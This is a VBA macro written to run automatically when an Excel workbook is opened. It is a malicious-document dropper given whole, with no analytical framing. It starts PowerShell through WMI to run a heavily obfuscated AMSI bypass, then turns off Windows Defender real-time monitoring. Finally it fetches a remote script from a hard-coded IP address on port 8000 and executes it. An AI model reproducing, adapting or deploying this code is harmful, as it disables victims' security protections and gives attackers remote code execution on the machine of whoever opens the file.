Sub Workbook_Open()
    Call Function1

End Sub

Sub Function1()
    'create win32 process
    Set x8c918cb11f319b71aa88014058a9bc04 = GetObject("winmgmts:\\.\root\cimv2")
    Set x04aeadbd7c61cca62007f2957f672d04 = x8c918cb11f319b71aa88014058a9bc04.Get("Win32_Process")
    'disable asmi
    x04aeadbd7c61cca62007f2957f672d04.Create ("C:\Windows\syswow64\WindowsPowerShell\v1.0\PowerShell.exe -NoExit  $bSuecF=$null;$vtgnwavvk=[$([CHar]([Byte]0x53)+[cHar](121*91/91)+[CHAr](115+5-5)+[ChAr](116*66/66)+[Char](101)+[CHar]([bYTE]0x6d)).Runtime.InteropServices.Marshal]::AllocHGlobal((9076*7257/7257));$zifhpiiotsdnsunroulzxvfdf="+[CHAR](98+5-5)+[cHar]([BYTe]0x68)+[chAr]([bYTE]0x6c)+[cHAr]([byte]0x63)+[chAR]([bYtE]0x6f)+[ChAR](118+81-81)+[cHaR](50+51)+[chAR]([bYte]0x66)+[Char]([bytE]0x79)+[Char]([byte]0x73)+[chAr]([BytE]0x7a)+[ChAr](104)+[cHAR]([bYtE]0x79)+[char]([bytE]0x74)+[cHAr]([BYtE]0x7a)+[char](109+93-93)+[CHAR]([byte]0x69)+[char](106+29-29)+[Char](117+17-17)+[chAR]([BYte]0x71)+[cHAr](98+95-95)+[CHar](114*24/24)+[cHAr](112)+[chAr](116+101-101)+[char](22+89)+[cHaR]([ByTE]0x79)+[cHaR]([BYte]0x79)";[Threading.Thread]::Sleep(191);[Ref].Assembly.GetType("$([CHar]([Byte]0x53)+[cHar](121*91/91)+[CHAr](115+5-5)+[ChAr](116*66/66)+[Char](101)+[CHar]([bYTE]0x6d)).$([cHAr](77+45-45)+[cHaR]([BytE]0x61)+[CHAr](110*63/63)+[Char]([ByTe]0x61)+[char](103*85/85)+[ChaR](101*33/33)+[CHAR]([bYTE]0x6d)+[CHaR](101)+[cHAR](85+25)+[CHaR](116)).$(('Âutómä'+'tîõn').norMALiZE([cHar]([BYTE]0x46)+[cHAR](111+101-101)+[chAR]([BYte]0x72)+[chAR](105+4)+[cHAR](68+59-59)) -replace [ChaR](7+85)+[chAR](112*62/62)+[ChAR]([bYte]0x7b)+[char](29+48)+[cHaR](110+96-96)+[Char](125*75/75)).$([char](65*62/62)+[char]([BYTE]0x6d)+[CHaR]([ByTe]0x73)+[cHAR](105*55/55)+[cHAR]([bYTe]0x55)+[cHAr](13+103)+[cHar]([BYte]0x69)+[ChAR](48+60)+[Char]([ByTe]0x73))").GetField("$(('âm'+'sì'+'Se'+'ss'+'îõ'+'n').nORMAliZe([Char](31+39)+[CHaR]([byTe]0x6f)+[ChaR](114)+[ChAr](94+15)+[CHar](68*35/35)) -replace [CHAR]([bYte]0x5c)+[ChAR]([BYTE]0x70)+[cHAr](29+94)+[ChAR](77+1-1)+[cHAR](110*68/68)+[CHar](125))", "NonPublic,Static").SetValue($bSuecF, $null);[Ref].Assembly.GetType("$([CHar]([Byte]0x53)+[cHar](121*91/91)+[CHAr](115+5-5)+[ChAr](116*66/66)+[Char](101)+[CHar]([bYTE]0x6d)).$([cHAr](77+45-45)+[cHaR]([BytE]0x61)+[CHAr](110*63/63)+[Char]([ByTe]0x61)+[char](103*85/85)+[ChaR](101*33/33)+[CHAR]([bYTE]0x6d)+[CHaR](101)+[cHAR](85+25)+[CHaR](116)).$(('Âutómä'+'tîõn').norMALiZE([cHar]([BYTE]0x46)+[cHAR](111+101-101)+[chAR]([BYte]0x72)+[chAR](105+4)+[cHAR](68+59-59)) -replace [ChaR](7+85)+[chAR](112*62/62)+[ChAR]([bYte]0x7b)+[char](29+48)+[cHaR](110+96-96)+[Char](125*75/75)).$([char](65*62/62)+[char]([BYTE]0x6d)+[CHaR]([ByTe]0x73)+[cHAR](105*55/55)+[cHAR]([bYTe]0x55)+[cHAr](13+103)+[cHar]([BYte]0x69)+[ChAR](48+60)+[Char]([ByTe]0x73))").GetField("$([CHAr]([BYTE]0x61)+[chAr]([BYtE]0x6d)+[ChAr](29+86)+[CHaR](105*37/37)+[CHAR](67)+[CHAr](111*96/96)+[CHaR]([BYTe]0x6e)+[ChaR]([bYTe]0x74)+[cHaR]([byTe]0x65)+[chAr](120+50-50)+[CHAr](116))", "NonPublic,Static").SetValue($null, [IntPtr]$vtgnwavvk);")
    'turn off windows defender
    x04aeadbd7c61cca62007f2957f672d04.Create ("C:\Windows\syswow64\WindowsPowerShell\v1.0\PowerShell.exe -NoExit Set-MpPreference -DisableRealtimeMonitoring $true")
    'download and run powershell
    x04aeadbd7c61cca62007f2957f672d04.Create ("C:\Windows\syswow64\WindowsPowerShell\v1.0\PowerShell.exe -NoExit [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true); iex ((New-Object Net.WebClient).DownloadString('http://157.230.125.35:8000/a.ps1'))")
    
End Sub